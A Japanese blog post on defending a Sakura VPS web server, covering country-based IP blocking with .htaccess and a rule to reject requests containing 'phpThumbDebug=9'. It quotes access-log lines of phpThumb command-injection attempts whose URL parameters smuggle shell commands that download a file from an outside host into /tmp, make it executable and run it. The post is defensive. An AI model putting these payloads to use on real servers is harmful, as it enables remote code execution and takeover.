さくらVPSへの攻撃と対応策 その2


前回の『さくらVPSへの攻撃と対応策』の続きです。

不正IPやアクセスを拒否

海外からのアクセスは拒否

Webサイトといっても、サイトによっては海外からのアクセスが不要な場合があります。バーチャルドメインで使用していたり、トラフィック監視やDB管理画面用のURL等は大抵国内から閲覧できればいいはずです。そういった場合に重宝します。

htaccessを使って国内からのみのIPを許容する

参考:IPアドレスで日本国外(海外/外国)からのアクセスを制限する.htaccess CGI’s

上記参考サイトを元に2011/12/04の国内IP一覧を元に、以下のように作成しています。wordpress用の設定も含んでいます。動作保障はできかねますので、各自自己責任でダウンロードください。
[download id=”7″ format=”2″]

特定のURIクエリからアクセスを制限する

WordPressのようなCMSを利用していると、いろんなプロキシを踏み台にして、特定のキーワードをクエリに載せて来る場合があります。以下がその一例です。

64.34.233.112 - - [22/Dec/2011:06:13:28 +0900] "GET /cms/plugins/content/jthumbs/includes/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-
interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barb
ut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 404 13610 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
64.34.233.112 - - [22/Dec/2011:06:13:33 +0900] "GET /wp-content/plugins/ione-core/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20
-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk/barbut6;chmod%200755%20/tmp/barbut6;/tmp/bar
but6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 404 13611 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"94.23.235.146 - - [23/Dec/2011:02:58:06 +0900] "GET /wp-content/themes/redcarpet/scripts/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%
2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpTh
umbDebug=9 HTTP/1.1" 404 13587 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.235.146 - - [23/Dec/2011:02:58:07 +0900] "GET /staticfiles/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line
%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404
 13563 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"

「64.34.233.112」「94.23.235.146」と複数のIPからのアクセスで同様なURIを使用しています。アクセス時のURIには「phpThumbDebug=9」が必ず入っています。このように共通したクエリでアクセスされた場合はhtaccessでこのキーワードを拒否させます。

<Files ~ "phpThumbDebug=9$">
deny from all
</Files>